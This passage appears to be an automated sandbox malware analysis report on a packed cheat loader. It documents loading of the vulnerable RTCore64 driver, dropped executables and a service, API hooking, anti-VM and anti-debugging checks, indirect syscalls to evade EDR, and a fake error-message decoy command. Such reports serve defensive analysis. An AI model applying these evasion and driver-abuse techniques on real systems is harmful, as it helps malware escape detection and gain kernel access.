Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5n source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GET /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb HTTP/1.1 source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbYz source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb)y source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\BRONKZ BACKUP 16 02 2024\Loaders C# Bronkz Private Store\Cheat Fortnite\ioctl base updated by redshirtfan\build\driver\driver.pdb source: lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10BD000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798931127.00000245E10C0000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798879988.00000245E10B2000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799010054.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp, driverfo[1].sys.0.dr, driverfo.sys.0.dr
Source: Binary string: win32k.pdbGCTL source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb@ source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bad cast%02xsymbols\.pdb/\\\.\RTCore64user32.dllwin32u.dllsystemroot\System32\win32k.syshttps://msdl.microsoft.com/download/symbols[-] Failed to Load PDBNtUserSetGestureConfig[-] Failed to Load Symbol of NtUserSetGestureConfig[<] Loading vulnerable driver, Name: [-] Can't find TEMP folder[-] Failed to create vulnerable driver file[-] Failed to register and start service for the vulnerable driver[-] Failed to load driver rtcore64.sysntoskrnl.exe[-] Failed to get ntoskrnl.exewin32k.sys[-] win32k.sys not foundxxxH source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1797006532.00000245E10AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: win32k.pdb source: Vulnerability.exe, 00000004.00000003.1879106664.000002181DBE1000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C225000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols4b74f1f14570c9cf7868ff6d4bda773.pdb - unmatched source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: /download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb.md5zs source: Vulnerability.exe, 00000004.00000003.1879183448.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb7 source: Vulnerability.exe, 00000004.00000002.1881188072.000002181DB0F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB0E000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: https://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdbm]g source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880187140.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879183448.000002181C279000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb1y. source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pC:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb source: Vulnerability.exe, 00000004.00000003.1879680608.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880308333.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1880992310.000002181C2D7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ddhttps://msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rosoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ConnectionKeep-Alive/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb source: Vulnerability.exe, 00000004.00000003.1878660285.000002181DB0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c9cf7868ff6d4bda773.pdbv source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdb;k source: Vulnerability.exe, 00000004.00000002.1880738454.0000005CC92F5000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\74b74f1f14570c9cf7868ff6d4bda773.pdbFranciscw source: Vulnerability.exe, 00000004.00000002.1881228820.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880399638.000002181DB3F000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1879912102.000002181DB3E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msdl.microsoft.com/download/symbols/win32k.pdb/48D900D36D061D26B056B74A830DF0DE1/win32k.pdb\ source: Vulnerability.exe, 00000004.00000002.1880929870.000002181C20C000.00000004.00000020.00020000.00000000.sdmp
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains sections with non-standard names
Source: lUAc7lqa56.exe Static PE information: section name: _RDATA
Source: lUAc7lqa56.exe Static PE information: section name: .vmp0
Source: lUAc7lqa56.exe Static PE information: section name: .vmp1

Persistence and Installation Behavior
barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows\Vulnerability.exe Jump to behavior
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\Vulnerability.exe Jump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys Jump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Jump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Vulnerability[1].exe Jump to dropped file
Source: C:\Windows\Vulnerability.exe File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\Vulnerability.exe Jump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exe File created: C:\Windows\driverfo.sys Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\Vulnerability.exe File created: C:\Users\user\AppData\Local\Temp\nULoYBmSWb Jump to dropped file
Creates or modifies windows services
Source: C:\Windows\Vulnerability.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\nULoYBmSWb Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE22370008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2220D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2238000D value: E9 BB CB EB FF Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Memory written: PID: 2256 base: 7FFE2223CBC0 value: E9 5A 34 14 00 Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7909B8B5C second address: 7FF7909B8B85 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7908F5097 second address: 7FF7908F50CA instructions: 0x00000000 rdtsc 0x00000002 neg eax 0x00000004 inc ecx 0x00000005 not ch 0x00000007 inc ecx 0x00000008 pop edi 0x00000009 inc ecx 0x0000000a and ch, FFFFFFEEh 0x0000000d inc ecx 0x0000000e pop esi 0x0000000f rcl ebp, cl 0x00000011 inc ecx 0x00000012 pop ebp 0x00000013 dec eax 0x00000014 add ebx, esp 0x00000016 mov cx, di 0x00000019 pop ecx 0x0000001a inc ecx 0x0000001b pop edx 0x0000001c stc 0x0000001d inc cx 0x0000001f sar ecx, FFFFFFA2h 0x00000022 popfd 0x00000023 lahf 0x00000024 mov dl, D2h 0x00000026 pop ebp 0x00000027 inc ecx 0x00000028 pop ebx 0x00000029 cwd 0x0000002b inc ebp 0x0000002c xchg ah, al 0x0000002e cbw 0x00000030 pop esi 0x00000031 inc ecx 0x00000032 pop eax 0x00000033 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF79039C244 second address: 7FF79039C26D instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 movzx eax, dx 0x00000006 inc ecx 0x00000007 rol bl, 1 0x00000009 inc cx 0x0000000b movsx eax, bl 0x0000000e dec eax 0x0000000f cdq 0x00000010 inc ecx 0x00000011 add bl, 0000006Ah 0x00000014 inc ecx 0x00000015 xor bl, 00000033h 0x00000018 inc ecx 0x00000019 cmp ah, FFFFFFD7h 0x0000001c inc ecx 0x0000001d sub bl, 0000004Eh 0x00000020 dec eax 0x00000021 cwde 0x00000022 dec eax 0x00000023 bsf edx, esp 0x00000026 inc ecx 0x00000027 xor dh, bl 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF790348D7E second address: 7FF790348DA1 instructions: 0x00000000 rdtsc 0x00000002 inc esp 0x00000003 xor dl, dl 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 pop ebp 0x00000008 mov di, 74EBh 0x0000000c popfd 0x0000000d inc ecx 0x0000000e mov dl, 73h 0x00000010 inc ecx 0x00000011 pop edi 0x00000012 dec eax 0x00000013 cmovs eax, ebp 0x00000016 inc ecx 0x00000017 pop ecx 0x00000018 inc cx 0x0000001a bswap eax 0x0000001c inc ecx 0x0000001d pop ebx 0x0000001e pop ecx 0x0000001f dec ecx 0x00000020 movzx esi, si 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lUAc7lqa56.exe RDTSC instruction interceptor: First address: 7FF7903F0928 second address: 7FF7903F0946 instructions: 0x00000000 rdtsc 0x00000002 inc ebp 0x00000003 bsr ecx, esi 0x00000006 inc ecx 0x00000007 pop ecx 0x00000008 popfd 0x00000009 cwde 0x0000000a cbw 0x0000000c movzx ebp, dx 0x0000000f pop edi 0x00000010 dec esp 0x00000011 movzx ebx, dx 0x00000014 cwde 0x00000015 inc ecx 0x00000016 xchg eax, ebx 0x00000017 pop ecx 0x00000018 cwde 0x00000019 inc ebp 0x0000001a xchg al, dh 0x0000001c inc ecx 0x0000001d pop esp 0x0000001e rdtsc
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Special instruction interceptor: First address: 7FF79089AE37 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Special instruction interceptor: First address: 7FF79089AE4F instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Dropped PE file which has not been started: C:\Windows\driverfo.sys Jump to dropped file
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\driverfo[1].sys Jump to dropped file
Source: C:\Windows\Vulnerability.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nULoYBmSWb Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\timeout.exe TID: 4856 Thread sleep count: 37 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC423B60 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 4_2_00007FF7CC423B60
Source: lUAc7lqa56.exe, 00000000.00000003.1796909009.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1041000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1798955245.00000245E10A5000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1042000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1024000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881188072.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1878660285.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880478460.000002181DB2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Vulnerability.exe, 00000004.00000003.1878741691.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000003.1880515250.000002181DAC3000.00000004.00000020.00020000.00000000.sdmp, Vulnerability.exe, 00000004.00000002.1881137135.000002181DAC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
Source: lUAc7lqa56.exe, 00000000.00000003.1799028406.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000003.1796945638.00000245E1050000.00000004.00000020.00020000.00000000.sdmp, lUAc7lqa56.exe, 00000000.00000002.1934554654.00000245E1050000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\lUAc7lqa56.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect debuggers (CloseHandle check)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Handle closed: DEADC0DE
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process queried: DebugObjectHandle Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7CC424B58
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4214C0 GetCurrentProcessId,CreateToolhelp32Snapshot,memset,Process32FirstW,Process32NextW,CloseHandle, 4_2_00007FF7CC4214C0
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC421630 SetUnhandledExceptionFilter,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,_wcsicmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,__std_fs_code_page,memcmp,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?wcout@std@@3V?$basic_ostream@_WU?$char_traits@_W@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7CC421630
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424B58 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7CC424B58
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC4243B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF7CC4243B8
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424D00 SetUnhandledExceptionFilter, 4_2_00007FF7CC424D00

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe NtProtectVirtualMemory: Indirect: 0x7FF79041E09E Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cd C:\ Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil" Jump to behavior
Source: C:\Users\user\Desktop\lUAc7lqa56.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Vulnerability.exe C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i /v "certutil" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /C "color b && title Error && echo SSL connect error && timeout /t 5" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5 Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\Vulnerability.exe Code function: GetLocaleInfoEx,FormatMessageA, 4_2_00007FF7CC4238A8
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Vulnerability.exe Code function: 4_2_00007FF7CC424D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_00007FF7CC424D6C
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
